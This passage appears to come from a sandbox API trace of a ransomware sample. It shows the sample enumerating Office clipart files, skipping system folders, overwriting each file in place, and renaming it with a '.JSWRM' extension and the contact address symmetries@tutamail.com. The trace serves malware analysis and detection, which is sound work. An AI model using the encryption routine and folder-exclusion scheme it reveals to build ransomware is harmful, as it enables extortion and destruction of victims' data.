Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0075.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.603] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x68c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00443_.WMF", cAlternateFileName="")) returned 1 [0075.603] lstrcmpiW (lpString1="BS00443_.WMF", lpString2=".") returned 1 [0075.603] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="..") returned 1 [0075.603] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="...") returned 1 [0075.603] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="windows") returned -1 [0075.603] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="recovery") returned -1 [0075.603] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="perflogs") returned -1 [0075.604] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="documents and settings") returned -1 [0075.604] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.604] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="system volume information") returned -1 [0075.604] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="msocache") returned -1 [0075.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0075.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00443_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00443_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00443_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0075.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00443_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00443_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00443_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.604] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1676) returned 1 [0075.604] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x680) returned 0x23fc98 [0075.604] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x680, lpOverlapped=0x0) returned 1 [0075.606] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.606] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x680, lpOverlapped=0x0) returned 1 [0075.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.606] CloseHandle (hObject=0x460) returned 1 [0075.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0075.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0075.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0075.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0075.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0075.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.607] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0075.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.607] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf38, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00444_.WMF", cAlternateFileName="")) returned 1 [0075.607] lstrcmpiW (lpString1="BS00444_.WMF", lpString2=".") returned 1 [0075.607] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="..") returned 1 [0075.607] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="...") returned 1 [0075.607] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="windows") returned -1 [0075.607] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="recovery") returned -1 [0075.607] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="perflogs") returned -1 [0075.607] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="documents and settings") returned -1 [0075.608] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.608] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="system volume information") returned -1 [0075.608] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="msocache") returned -1 [0075.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00444_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00444_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00444_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0075.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00444_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00444_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00444_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0075.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.608] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3896) returned 1 [0075.608] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf30) returned 0x24c1d0 [0075.608] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xf30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xf30, lpOverlapped=0x0) returned 1 [0075.675] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.675] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xf30, lpOverlapped=0x0) returned 1 [0075.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.675] CloseHandle (hObject=0x460) returned 1 [0075.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0075.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0075.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0075.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0075.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0075.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.676] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0075.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.678] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00445_.WMF", cAlternateFileName="")) returned 1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2=".") returned 1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="..") returned 1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="...") returned 1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="windows") returned -1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="recovery") returned -1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="perflogs") returned -1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="documents and settings") returned -1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.678] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="system volume information") returned -1 [0075.679] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="msocache") returned -1 [0075.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0075.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00445_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00445_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00445_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0075.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00445_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00445_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00445_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.680] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3796) returned 1 [0075.680] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xed0) returned 0x24c1d0 [0075.680] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xed0, lpOverlapped=0x0) returned 1 [0075.681] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.681] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xed0, lpOverlapped=0x0) returned 1 [0075.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.682] CloseHandle (hObject=0x460) returned 1 [0075.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0075.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0075.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0075.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0075.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0075.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.682] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0075.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.683] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00453_.WMF", cAlternateFileName="")) returned 1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2=".") returned 1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="..") returned 1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="...") returned 1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="windows") returned -1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="recovery") returned -1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="perflogs") returned -1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="documents and settings") returned -1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="system volume information") returned -1 [0075.683] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="msocache") returned -1 [0075.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0075.683] WideCharToMultiByte 